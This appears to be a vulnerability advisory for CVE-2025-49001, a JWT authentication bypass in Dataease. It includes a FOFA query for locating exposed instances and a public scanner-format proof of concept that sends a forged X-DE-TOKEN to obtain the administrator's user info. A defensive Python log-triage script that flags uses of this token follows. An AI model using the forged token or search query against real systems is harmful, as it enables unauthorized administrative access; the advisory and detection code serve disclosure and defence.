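CVE-2025-49001: Dataease JWT Authentication Bypass Vulnerability

Date: 2025-09-01 | Affected software: Dataease | PoC: public

Vulnerability description

CVE-2025-49001 is caused by a flaw in the JWT verification mechanism that allows an attacker to forge a JWT token and bypass the authentication flow.
fofa:body="/js/index-0.0.0-dataease.js" || body="/assets/css/style-0.0.0-dataease.css"

PoC code [public]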

id: CVE-2025-49001

info:
  name: Dataease JWT 认证绕过漏洞
  author: avic123
  severity: high
  verified: true
  description: |
    CVE-2025-49001 是由于JWT校验机制错误导致攻击者可伪造JWT令牌绕过身份验证流程
    fofa:body="/js/index-0.0.0-dataease.js" || body="/assets/css/style-0.0.0-dataease.css"
  reference:
    - https://mp.weixin.qq.com/s/2-FBRPZdPY-4MLYC9Syveg
  tags: cve,cve2025,Dataease,JWT
  created: 2025/06/11

rules:
  r0:
    request:
      method: GET
      path: /de2api/user/info
      headers:
        X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
    expression: response.status == 200 && response.body.bcontains(b"\"id\":\"1\"") && response.body.bcontains(b"\"name\":\"系统管理员\"") && response.body.bcontains(b"\"oid\":\"1\"")
expression: r0()
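
For defenders, a log-triage sketch built around the request in rule r0. It is an added example, not part of the original PoC or of the Dataease code base. It flags `/de2api/` requests that were answered with status 200 although the `X-DE-TOKEN` value is the published PoC token or fails HS256 verification. Assumptions: the JSON log schema (`src`, `path`, `status`, `x_de_token`) is hypothetical, the key and sample log lines are constructed, and the deployment can supply the HS256 key its tokens should verify under.

```python
import base64, hashlib, hmac, json

# Token from the X-DE-TOKEN header of rule r0 in the PoC on this page.
POC_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8"

def _b64d(seg):
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))
def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def hs256_valid(token, secret):
    """True only for a well-formed HS256 JWT whose signature verifies under secret."""
    try:
        head, body, sig = token.split(".")
        if json.loads(_b64d(head)).get("alg") != "HS256":
            return False
        mac = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
        return hmac.compare_digest(mac, _b64d(sig))
    except (ValueError, AttributeError):
        return False

def claims(token):
    """Decode the payload segment without trusting it (for the analyst's report)."""
    try:
        return json.loads(_b64d(token.split(".")[1]))
    except (ValueError, IndexError):
        return None

def triage(log_lines, secret):
    """Flag /de2api requests answered 200 although the token should have been rejected."""
    findings = []
    for line in log_lines:
        rec = json.loads(line)
        tok = rec.get("x_de_token") or ""
        if not tok or rec["status"] != 200 or not rec["path"].startswith("/de2api/"):
            continue
        reason = "published PoC token" if tok == POC_TOKEN else "signature does not verify"
        if tok == POC_TOKEN or not hs256_valid(tok, secret):
            findings.append((rec["src"], reason, claims(tok)))
    return findings

# Constructed sample data: key, addresses and log schema are hypothetical.
SECRET = b"constructed-demo-key"
_h, _b = _b64e(b'{"typ":"JWT","alg":"HS256"}'), _b64e(b'{"uid":7,"oid":1}')
_sig = _b64e(hmac.new(SECRET, f"{_h}.{_b}".encode(), hashlib.sha256).digest())
GOOD, TAMPERED = ".".join([_h, _b, _sig]), ".".join([_h, _b64e(b'{"uid":9,"oid":1}'), _sig])
SAMPLE_LOG = [json.dumps({"src": s, "path": "/de2api/user/info", "status": c, "x_de_token": t})
              for s, c, t in (("192.0.2.10", 200, GOOD), ("198.51.100.7", 200, POC_TOKEN),
                              ("203.0.113.5", 200, TAMPERED), ("203.0.113.9", 401, POC_TOKEN))]
if __name__ == "__main__": print(*triage(SAMPLE_LOG, SECRET), sep="\n")
```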
